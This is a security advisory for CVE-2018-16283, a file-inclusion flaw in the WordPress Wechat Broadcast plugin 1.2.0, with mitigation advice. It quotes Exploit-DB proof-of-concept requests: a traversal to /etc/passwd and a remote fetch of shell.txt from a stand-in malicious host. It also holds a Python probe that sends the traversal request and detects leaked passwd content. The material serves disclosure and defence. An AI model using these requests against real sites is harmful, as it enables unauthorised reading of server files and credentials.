Vendor: Wechat Broadcast
By: Manuel Garcia Cardenas
CVSS: 9.8 (CRITICAL)
CWE: 22 (Local File Inclusion)
Product Name: Wechat Broadcast
Affected Version From: 1.2.2000
Affected Version To: 1.2.2000
Patch Exists: YES
Related CVE: CVE-2018-16283
CPE: a:wordpress:wechat_broadcast:1.2.0
Metasploit:
Other Scripts:
Tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'wechat_brodcast_project', 'product': 'wechat_brodcast'}
Platforms Tested: WordPress
2018

WordPress Plugin Wechat Broadcast 1.2.0 – Local File Inclusion

The Wechat Broadcast plugin for WordPress ships a script, /wechat-broadcast/wechat/Image.php, that passes the unsanitized 'url' GET parameter straight to file_get_contents() and echoes the result. An unauthenticated attacker can therefore read any file the web server user can open (path traversal to /etc/passwd, the WordPress configuration file, and so on) and, where PHP's allow_url_fopen is enabled, make the server fetch and reflect the contents of an arbitrary remote URL. The advisory notes that a plain HTTP/1.0 request is sufficient to trigger the flaw. Because file_get_contents() returns data rather than executing it, the "remote file inclusion" case yields content reflection and server-side request forgery, not direct code execution; the local case is an arbitrary file read.

Mitigation:

Update the plugin to a version later than 1.2.0, in which the issue is patched. Until the update is applied, or if the plugin is no longer needed, remove it or deny direct web access to wechat/Image.php with a web server rule. Any code that takes a file reference from the request should validate it against an allowlist of expected local files, reject scheme prefixes (http://, php://, data: and similar wrappers) and ".." segments, and confine the resolved path to the plugin's own directory before calling file_get_contents().

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283

# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" is not sanitized, allowing inclusion of local or remote files.
# To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol
# to interact with the application.

# PoC
# The following URLs have been confirmed to be vulnerable to local and remote file inclusion.

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

# Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
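The two requests above, turned into a small probe and a matching input check. This is an added example and is not part of the advisory or of the plugin: it builds the advisory's request as raw HTTP/1.0, classifies the response by the root entry of /etc/passwd, and shows the shape of the validation a fixed Image.php would need (an illustration of the fix, not the vendor's actual patch). The host wordpress.example, the /wordpress/ install root, port 80 and the sample responses are constructed assumptions.

```python
"""Probe and input check for CVE-2018-16283 (Wechat Broadcast <= 1.2.0, Image.php 'url').

Added example, not from the original advisory. Target host, install root and the
sample responses below are assumptions; nothing here is captured from a real site.
"""
import re
import socket
import sys
from urllib.parse import quote

IMAGE_PHP = "wp-content/plugins/wechat-broadcast/wechat/Image.php"

# Traversal payload from the advisory: enough "../" to reach / from any plausible depth.
LFI_PAYLOAD = "../" * 10 + "etc/passwd"

# First entry of /etc/passwd on practically every Linux host; a cheap, low-false-positive marker.
PASSWD_RE = re.compile(rb"^root:[^:]*:0:0:", re.MULTILINE)


def build_probe_request(host: str, wp_root: str = "/wordpress/", payload: str = LFI_PAYLOAD) -> bytes:
    """Return the raw request the advisory describes, as HTTP/1.0.

    HTTP/1.0 keeps the exchange simple: no chunked encoding and no keep-alive, the
    server closes the connection after the body. A Host header is still sent so
    name-based virtual hosts route the request.
    """
    path = wp_root.rstrip("/") + "/" + IMAGE_PHP + "?url=" + quote(payload, safe="/:")
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def split_response(raw: bytes) -> tuple[int, bytes]:
    """Parse the status code and body out of a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    code = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
    return code, body


def looks_vulnerable(raw_response: bytes) -> bool:
    """True when the response echoes /etc/passwd content (HTTP 200 plus a root entry)."""
    code, body = split_response(raw_response)
    return code == 200 and PASSWD_RE.search(body) is not None


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Send a raw request and read until the server closes (HTTP/1.0 semantics)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def is_safe_image_ref(value: str) -> bool:
    """The check a fixed Image.php should apply before file_get_contents().

    Rejects stream wrappers and URLs (anything with a scheme prefix), absolute
    paths, NUL bytes and any '..' or empty path segment; only a plain relative
    filename under the plugin's own directory passes. Illustrative shape only.
    """
    if not value or "\x00" in value:
        return False
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*:", value):  # http://, php://, data:, C: ...
        return False
    if value.startswith(("/", "\\")):
        return False
    if any(seg in ("..", "") for seg in re.split(r"[\\/]", value)):
        return False
    return True


# Constructed sample responses (not captured from a real host) for offline checks.
SAMPLE_VULNERABLE = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                     b"root:x:0:0:root:/root:/bin/bash\n"
                     b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
SAMPLE_PATCHED = b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    # Usage: python probe.py <host>; without a host only the request is printed.
    target = sys.argv[1] if len(sys.argv) > 1 else "wordpress.example"  # assumed target
    req = build_probe_request(target)
    print(req.decode())
    if len(sys.argv) > 1:
        print("vulnerable" if looks_vulnerable(send_raw(target, 80, req)) else "not vulnerable")
```

Run it against a copy of the plugin you are authorised to test; the response classifier keys on the root entry rather than on a 200 status alone, because Image.php answers 200 with an empty body when the read fails, which is exactly what the patched sample reproduces.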